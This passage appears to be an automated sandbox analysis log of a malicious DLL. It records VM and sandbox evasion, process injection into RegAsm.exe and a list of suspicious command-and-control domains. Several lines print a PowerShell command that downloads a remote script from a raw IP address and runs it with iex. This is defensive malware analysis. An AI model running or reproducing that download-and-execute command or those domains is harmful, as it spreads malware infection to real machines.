            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7228, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5656, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: B50000 memory reserve | memory write watch
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: 2730000 memory reserve | memory write watch
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: C60000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 4320000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 46C0000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 43A0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010ED152 sgdt fword ptr [eax+eax]41_2_010ED152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010FCFBA sldt word ptr [eax]41_2_010FCFBA
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6186
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2223
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6350
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2081
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6028
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3561
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4989
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4745
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.dll
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7824Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep time: -18446744073709540s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2740Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 332Thread sleep count: 6350 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep time: -17524406870024063s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep count: 2081 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6816Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep time: -21213755684765971s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6476Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep count: 4989 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5652Thread sleep count: 4745 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7664Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2508Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2976Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4032Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3364Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: loaddll32.exe, 00000000.00000002.1679756865.0000000004CEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0
            Source: rundll32.exe, 00000006.00000002.1590146059.0000000006F2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RegAsm.exe, 00000029.00000002.1806244051.0000000001065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW({
            Source: loaddll32.exe, 00000000.00000002.1679756865.0000000004CB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\q
            Source: regsvr32.exe, 00000004.00000002.1626689881.0000000006BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: RegAsm.exe, RegAsm.exe, 00000029.00000002.1806244051.000000000109F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 0000001B.00000002.1670598769.0000000007028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
            Source: rundll32.exe, 00000005.00000002.1635048001.00000000034FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\j
            Source: RegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
            Source: rundll32.exe, 00000006.00000002.1590146059.0000000006F2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\^
            Source: RegAsm.exe, 00000023.00000002.1754899784.0000000001145000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW04
            Source: powershell.exe, 0000000D.00000002.1615989853.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1579325198.00000000079DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: rundll32.exe, 00000005.00000002.1635048001.00000000034FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}r
            Source: powershell.exe, 0000000F.00000002.1629065195.0000000006D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0043C1F0 LdrInitializeThunk,31_2_0043C1F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: 13.2.powershell.exe.592a7f0.2.raw.unpack, Engineers.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 13.2.powershell.exe.592a7f0.2.raw.unpack, Engineers.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
            Source: 13.2.powershell.exe.592a7f0.2.raw.unpack, Engineers.cs | Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File written: C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.0.cs
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000058FC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: volcanoyev.click
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 754008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 673008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CCA008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AE1008
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline"
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline"
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline"
            Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
